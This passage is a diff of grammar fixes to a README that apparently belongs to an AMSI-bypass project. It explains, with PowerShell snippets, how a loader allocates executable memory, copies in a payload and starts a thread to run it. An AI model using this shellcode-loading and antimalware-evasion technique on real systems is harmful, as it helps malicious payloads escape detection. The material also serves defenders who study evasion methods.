Haru1O1/AMSI_Powershell_Bypass/README.md

 [K2]::Copy($pl, 0, $mem, $plSize)
 ```
-First calculated the size of the payload in bytes and store as $plSize
+First, calculate the size of the payload in bytes and store it as $plSize
-Next allocate memory for the payload using the VirtualAlloc function with the va method.
-Add the allocation type 0x3000 which means to have the memory region both reserved and comitted.
+Next, allocate memory for the payload using the VirtualAlloc function with the va method.
+Add the allocation type 0x3000, which means to have the memory region both reserved and committed.
 - 0x1000 (MEM_COMMIT)
     - Flag used to allocate physical storage
 - 0x2000 (MEM_RESERVE)
     - Flag that reserves memory space and saves it for future use
-Add the protection flag 0x40 which indicates PAGE_EXECUTE_READWRITE meaning the memory can be executed, read, and written to.
+Add the protection flag 0x40, which indicates PAGE_EXECUTE_READWRITE, meaning the memory can be executed, read, and written to.
-Next copy the payload into the allocated memory.
+Next, copy the payload into the allocated memory.

 # 8.
 ```powershell
 $oldProtect = 0
 $protectionResult = [K2]::vp($mem, [UIntPtr]::new($plSize), 0x40, [ref]$oldProtect)
 ```
-Changes the allocated memory protection to 0x40 which allows the payload to execute as soon as it's copied into memory.
+Changes the allocated memory protection to 0x40, which allows the payload to execute as soon as it's copied into memory.
 The vp method is called to ensure the memory is executable.

 # 9.
 ```powershell
 $threadId = [IntPtr]::Zero
 $hThread = [K2]::CreateThread([IntPtr]::Zero, 0, $mem, [IntPtr]::Zero, 0, [ref]$threadId)
 ```
-Creates a thread that executes at the allocated memory of which the copied payload resides.
+Creates a thread that executes at the allocated memory where the copied payload resides.

 # 10.
 ```powershell